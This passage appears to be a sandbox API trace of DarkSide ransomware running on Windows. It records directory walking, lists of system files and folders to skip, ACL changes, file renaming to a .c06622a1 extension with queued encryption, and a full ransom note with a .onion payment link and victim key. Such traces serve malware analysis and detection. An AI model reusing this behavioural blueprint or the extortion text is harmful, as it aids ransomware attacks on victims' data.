ftLastWriteTime.dwLowDateTime=0x8ce56020, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.729] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb952510, ftCreationTime.dwHighDateTime=0x1d5e234, ftLastAccessTime.dwLowDateTime=0x518ae250, ftLastAccessTime.dwHighDateTime=0x1d5e656, ftLastWriteTime.dwLowDateTime=0x518ae250, ftLastWriteTime.dwHighDateTime=0x1d5e656, nFileSizeHigh=0x0, nFileSizeLow=0x97f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eesgA2CQjR2iHr87n4.mp3", cAlternateFileName="EESGA2~1.MP3")) returned 1 [0159.729] _wcsicmp (_Str1="eesgA2CQjR2iHr87n4.mp3", _Str2="README.c06622a1.TXT") returned -13 [0159.729] wcsstr (_Str="eesgA2CQjR2iHr87n4.mp3", _SubStr="README") returned 0x0 [0159.729] _wcsicmp (_Str1="autorun.inf", _Str2="eesgA2CQjR2iHr87n4.mp3") returned -4 [0159.729] wcslen (_String="autorun.inf") returned 0xb [0159.729] _wcsicmp (_Str1="boot.ini", _Str2="eesgA2CQjR2iHr87n4.mp3") returned -3 [0159.729] wcslen (_String="boot.ini") returned 0x8 [0159.729] _wcsicmp (_Str1="bootfont.bin", _Str2="eesgA2CQjR2iHr87n4.mp3") returned -3 [0159.729] wcslen (_String="bootfont.bin") returned 0xc [0159.729] _wcsicmp (_Str1="bootsect.bak", _Str2="eesgA2CQjR2iHr87n4.mp3") returned -3 [0159.729] wcslen (_String="bootsect.bak") returned 0xc [0159.729] _wcsicmp (_Str1="desktop.ini", _Str2="eesgA2CQjR2iHr87n4.mp3") returned -1 [0159.729] wcslen (_String="desktop.ini") returned 0xb [0159.729] _wcsicmp (_Str1="iconcache.db", _Str2="eesgA2CQjR2iHr87n4.mp3") returned 4 [0159.729] wcslen (_String="iconcache.db") returned 0xc [0159.729] _wcsicmp (_Str1="ntldr", _Str2="eesgA2CQjR2iHr87n4.mp3") returned 9 [0159.729] wcslen (_String="ntldr") returned 0x5 [0159.729] _wcsicmp (_Str1="ntuser.dat", _Str2="eesgA2CQjR2iHr87n4.mp3") returned 9 [0159.729] wcslen (_String="ntuser.dat") returned 0xa [0159.729] _wcsicmp (_Str1="ntuser.dat.log", _Str2="eesgA2CQjR2iHr87n4.mp3") returned 9 [0159.729] wcslen (_String="ntuser.dat.log") returned 0xe [0159.729] _wcsicmp (_Str1="ntuser.ini", _Str2="eesgA2CQjR2iHr87n4.mp3") returned 9 [0159.729] wcslen (_String="ntuser.ini") returned 0xa [0159.730] _wcsicmp (_Str1="thumbs.db", _Str2="eesgA2CQjR2iHr87n4.mp3") returned 15 [0159.730] wcslen (_String="thumbs.db") returned 0x9 [0159.730] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0159.730] wcslen (_String="386") returned 0x3 [0159.730] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0159.730] wcslen (_String="adv") returned 0x3 [0159.730] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0159.730] wcslen (_String="ani") returned 0x3 [0159.730] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0159.730] wcslen (_String="bat") returned 0x3 [0159.730] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0159.730] wcslen (_String="bin") returned 0x3 [0159.730] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0159.730] wcslen (_String="cab") returned 0x3 [0159.730] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0159.730] wcslen (_String="cmd") returned 0x3 [0159.730] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0159.730] wcslen (_String="com") returned 0x3 [0159.730] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0159.730] wcslen (_String="cpl") returned 0x3 [0159.730] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0159.730] wcslen (_String="cur") returned 0x3 [0159.730] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0159.730] wcslen (_String="deskthemepack") returned 0xd [0159.730] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0159.730] wcslen (_String="diagcab") returned 0x7 [0159.730] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0159.731] wcslen (_String="diagcfg") returned 0x7 [0159.731] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0159.731] wcslen (_String="diagpkg") returned 0x7 [0159.731] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0159.731] wcslen (_String="dll") returned 0x3 [0159.731] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0159.731] wcslen (_String="drv") returned 0x3 [0159.731] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0159.731] wcslen (_String="exe") returned 0x3 [0159.731] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0159.731] wcslen (_String="hlp") returned 0x3 [0159.731] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0159.731] wcslen (_String="icl") returned 0x3 [0159.731] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0159.731] wcslen (_String="icns") returned 0x4 [0159.731] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0159.731] wcslen (_String="ico") returned 0x3 [0159.731] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0159.731] wcslen (_String="ics") returned 0x3 [0159.731] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0159.731] wcslen (_String="idx") returned 0x3 [0159.731] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0159.731] wcslen (_String="ldf") returned 0x3 [0159.731] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0159.731] wcslen (_String="lnk") returned 0x3 [0159.731] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0159.731] wcslen (_String="mod") returned 0x3 [0159.731] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0159.731] wcslen (_String="mpa") returned 0x3 [0159.731] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0159.731] wcslen (_String="msc") returned 0x3 [0159.732] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0159.732] wcslen (_String="msp") returned 0x3 [0159.732] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0159.732] wcslen (_String="msstyles") returned 0x8 [0159.732] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0159.732] wcslen (_String="msu") returned 0x3 [0159.732] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0159.732] wcslen (_String="nls") returned 0x3 [0159.732] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0159.732] wcslen (_String="nomedia") returned 0x7 [0159.732] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0159.732] wcslen (_String="ocx") returned 0x3 [0159.732] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0159.732] wcslen (_String="prf") returned 0x3 [0159.732] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0159.732] wcslen (_String="ps1") returned 0x3 [0159.732] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0159.732] wcslen (_String="rom") returned 0x3 [0159.732] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0159.732] wcslen (_String="rtp") returned 0x3 [0159.732] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0159.732] wcslen (_String="scr") returned 0x3 [0159.732] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0159.732] wcslen (_String="shs") returned 0x3 [0159.732] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0159.732] wcslen (_String="spl") returned 0x3 [0159.732] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0159.732] wcslen (_String="sys") returned 0x3 [0159.732] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0159.732] wcslen (_String="theme") returned 0x5 [0159.732] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0159.732] wcslen (_String="themepack") returned 0x9 [0159.732] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0159.733] wcslen (_String="wpx") returned 0x3 [0159.733] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0159.733] wcslen (_String="lock") returned 0x4 [0159.733] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0159.733] wcslen (_String="key") returned 0x3 [0159.733] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0159.733] wcslen (_String="hta") returned 0x3 [0159.733] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0159.733] wcslen (_String="msi") returned 0x3 [0159.733] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0159.733] wcslen (_String="pdb") returned 0x3 [0159.733] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0159.733] wcslen (_String="sqlite") returned 0x6 [0159.733] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\j0yi t")) returned 0x10 [0159.733] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.733] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t" [0159.733] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t") returned 0x2e [0159.733] wcscpy (in: _Dest=0x32400be, _Source="eesgA2CQjR2iHr87n4.mp3" | out: _Dest="eesgA2CQjR2iHr87n4.mp3") returned="eesgA2CQjR2iHr87n4.mp3" [0159.733] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t\\eesgA2CQjR2iHr87n4.mp3", dwFileAttributes=0x80) returned 1 [0159.733] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t\\eesgA2CQjR2iHr87n4.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\j0yi t\\eesga2cqjr2ihr87n4.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0159.734] SetFilePointerEx (in: hFile=0x1c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.734] ReadFile (in: hFile=0x1c, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0159.734] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x95216aa [0159.734] RtlComputeCrc32 (PartialCrc=0x16aa, Buffer=0x32e9a4, Length=0x80) returned 0x1d5b05fd [0159.734] RtlComputeCrc32 (PartialCrc=0x5fd, Buffer=0x32e9a4, Length=0x80) returned 0xe1a3eaa8 [0159.734] RtlComputeCrc32 (PartialCrc=0xeaa8, Buffer=0x32e9a4, Length=0x80) returned 0x5ddf7c0d [0159.735] RtlComputeCrc32 (PartialCrc=0x7c0d, Buffer=0x32e9a4, Length=0x80) returned 0x530fd48f [0159.735] CloseHandle (hObject=0x1c) returned 1 [0159.735] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.735] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t\\eesgA2CQjR2iHr87n4.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t\\eesgA2CQjR2iHr87n4.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t\\eesgA2CQjR2iHr87n4.mp3" [0159.735] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t\\eesgA2CQjR2iHr87n4.mp3") returned 0x45 [0159.735] wcscpy (in: _Dest=0x32500f2, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.735] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t\\eesgA2CQjR2iHr87n4.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\j0yi t\\eesga2cqjr2ihr87n4.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t\\eesgA2CQjR2iHr87n4.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\j0yi t\\eesga2cqjr2ihr87n4.mp3.c06622a1"), dwFlags=0x8) returned 1 [0159.738] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J0yI t\\eesgA2CQjR2iHr87n4.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\j0yi t\\eesga2cqjr2ihr87n4.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c [0159.738] CreateIoCompletionPort (FileHandle=0x1c, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0159.738] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0159.743] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7edf8a32 [0159.743] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x8237ec6 [0159.743] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x610054f [0159.743] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2ed57e9f [0159.743] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x45d48b2 [0159.743] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6fd6742c [0159.743] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5f2c6012 [0159.743] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7d6eed37 [0159.746] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x76bf4de2 [0159.746] RtlComputeCrc32 (PartialCrc=0x4de2, Buffer=0x710094, Length=0x80) returned 0xb0fa39ac [0159.746] RtlComputeCrc32 (PartialCrc=0x39ac, Buffer=0x710094, Length=0x80) returned 0xc5613e3f [0159.746] RtlComputeCrc32 (PartialCrc=0x3e3f, Buffer=0x710094, Length=0x80) returned 0x8e596bd3 [0159.746] RtlComputeCrc32 (PartialCrc=0x6bd3, Buffer=0x710094, Length=0x80) returned 0xdc2c6e71 [0159.746] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0159.746] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.746] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.747] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ce56020, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8ce56020, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8ce7c180, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0159.747] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0159.747] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.747] FindClose (in: hFindFile=0x154188 | out: hFindFile=0x154188) returned 1 [0159.747] _wcsicmp (_Str1="backup", _Str2="J0yI t") returned -8 [0159.747] wcslen (_String="backup") returned 0x6 [0159.747] _wcsicmp (_Str1="bak", _Str2="J0yI t") returned -8 [0159.747] wcslen (_String="bak") returned 0x3 [0159.747] _wcsicmp (_Str1="back", _Str2="J0yI t") returned -8 [0159.747] wcslen (_String="back") returned 0x4 [0159.747] _wcsicmp (_Str1="archive", _Str2="J0yI t") returned -9 [0159.747] wcslen (_String="archive") returned 0x7 [0159.747] _wcsicmp (_Str1="bckp", _Str2="J0yI t") returned -8 [0159.747] wcslen (_String="bckp") returned 0x4 [0159.747] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0159.748] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0159.749] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac34da80, ftCreationTime.dwHighDateTime=0x1d5e200, ftLastAccessTime.dwLowDateTime=0x1d284ca0, ftLastAccessTime.dwHighDateTime=0x1d5e6bf, ftLastWriteTime.dwLowDateTime=0x1d284ca0, ftLastWriteTime.dwHighDateTime=0x1d5e6bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="k-cI7bu1aSXti5iWZuUR", cAlternateFileName="K-CI7B~1")) returned 1 [0159.749] _wcsicmp (_Str1="$recycle.bin", _Str2="k-cI7bu1aSXti5iWZuUR") returned -71 [0159.749] wcslen (_String="$recycle.bin") returned 0xc [0159.749] _wcsicmp (_Str1="config.msi", _Str2="k-cI7bu1aSXti5iWZuUR") returned -8 [0159.749] wcslen (_String="config.msi") returned 0xa [0159.749] _wcsicmp (_Str1="$windows.~bt", _Str2="k-cI7bu1aSXti5iWZuUR") returned -71 [0159.749] wcslen (_String="$windows.~bt") returned 0xc [0159.749] _wcsicmp (_Str1="$windows.~ws", _Str2="k-cI7bu1aSXti5iWZuUR") returned -71 [0159.750] wcslen (_String="$windows.~ws") returned 0xc [0159.750] _wcsicmp (_Str1="windows", _Str2="k-cI7bu1aSXti5iWZuUR") returned 12 [0159.750] wcslen (_String="windows") returned 0x7 [0159.750] _wcsicmp (_Str1="appdata", _Str2="k-cI7bu1aSXti5iWZuUR") returned -10 [0159.750] wcslen (_String="appdata") returned 0x7 [0159.750] _wcsicmp (_Str1="application data", _Str2="k-cI7bu1aSXti5iWZuUR") returned -10 [0159.750] wcslen (_String="application data") returned 0x10 [0159.750] _wcsicmp (_Str1="boot", _Str2="k-cI7bu1aSXti5iWZuUR") returned -9 [0159.750] wcslen (_String="boot") returned 0x4 [0159.750] _wcsicmp (_Str1="google", _Str2="k-cI7bu1aSXti5iWZuUR") returned -4 [0159.750] wcslen (_String="google") returned 0x6 [0159.750] _wcsicmp (_Str1="mozilla", _Str2="k-cI7bu1aSXti5iWZuUR") returned 2 [0159.750] wcslen (_String="mozilla") returned 0x7 [0159.750] _wcsicmp (_Str1="program files", _Str2="k-cI7bu1aSXti5iWZuUR") returned 5 [0159.750] wcslen (_String="program files") returned 0xd [0159.750] _wcsicmp (_Str1="program files (x86)", _Str2="k-cI7bu1aSXti5iWZuUR") returned 5 [0159.750] wcslen (_String="program files (x86)") returned 0x13 [0159.750] _wcsicmp (_Str1="programdata", _Str2="k-cI7bu1aSXti5iWZuUR") returned 5 [0159.750] wcslen (_String="programdata") returned 0xb [0159.750] _wcsicmp (_Str1="system volume information", _Str2="k-cI7bu1aSXti5iWZuUR") returned 8 [0159.750] wcslen (_String="system volume information") returned 0x19 [0159.750] _wcsicmp (_Str1="tor browser", _Str2="k-cI7bu1aSXti5iWZuUR") returned 9 [0159.750] wcslen (_String="tor browser") returned 0xb [0159.750] _wcsicmp (_Str1="windows.old", _Str2="k-cI7bu1aSXti5iWZuUR") returned 12 [0159.750] wcslen (_String="windows.old") returned 0xb [0159.750] _wcsicmp (_Str1="intel", _Str2="k-cI7bu1aSXti5iWZuUR") returned -2 [0159.750] wcslen (_String="intel") returned 0x5 [0159.750] _wcsicmp (_Str1="msocache", _Str2="k-cI7bu1aSXti5iWZuUR") returned 2 [0159.750] wcslen (_String="msocache") returned 0x8 [0159.750] _wcsicmp (_Str1="perflogs", _Str2="k-cI7bu1aSXti5iWZuUR") returned 5 [0159.750] wcslen (_String="perflogs") returned 0x8 [0159.750] _wcsicmp (_Str1="x64dbg", _Str2="k-cI7bu1aSXti5iWZuUR") returned 13 [0159.750] wcslen (_String="x64dbg") returned 0x6 [0159.750] _wcsicmp (_Str1="public", _Str2="k-cI7bu1aSXti5iWZuUR") returned 5 [0159.750] wcslen (_String="public") returned 0x6 [0159.751] _wcsicmp (_Str1="all users", _Str2="k-cI7bu1aSXti5iWZuUR") returned -10 [0159.751] wcslen (_String="all users") returned 0x9 [0159.751] _wcsicmp (_Str1="default", _Str2="k-cI7bu1aSXti5iWZuUR") returned -7 [0159.751] wcslen (_String="default") returned 0x7 [0159.751] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*" [0159.751] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned 0x29 [0159.751] wcscpy (in: _Dest=0x208e70, _Source="k-cI7bu1aSXti5iWZuUR" | out: _Dest="k-cI7bu1aSXti5iWZuUR") returned="k-cI7bu1aSXti5iWZuUR" [0159.751] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0159.751] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0159.751] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR" [0159.751] GetNamedSecurityInfoW () returned 0x0 [0159.752] SetEntriesInAclW () returned 0x0 [0159.752] SetNamedSecurityInfoW () returned 0x0 [0159.754] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22b988) returned 1 [0159.754] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e8ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0159.755] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k-ci7bu1asxti5iwzuur")) returned 1 [0159.755] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0159.755] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k-ci7bu1asxti5iwzuur\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0159.755] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e8bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e8bc*=0x7ca, lpOverlapped=0x0) returned 1 [0159.756] CloseHandle (hObject=0x1bc) returned 1 [0159.756] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0159.756] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k-ci7bu1asxti5iwzuur")) returned 0x10 [0159.756] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\") returned="" [0159.756] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\") returned 0x3d [0159.757] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\*", fInfoLevelId=0x0, lpFindFileData=0x32eb1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb1c) returned 0x154188 [0159.757] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac34da80, ftCreationTime.dwHighDateTime=0x1d5e200, ftLastAccessTime.dwLowDateTime=0x8cec8440, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8cec8440, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.757] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, 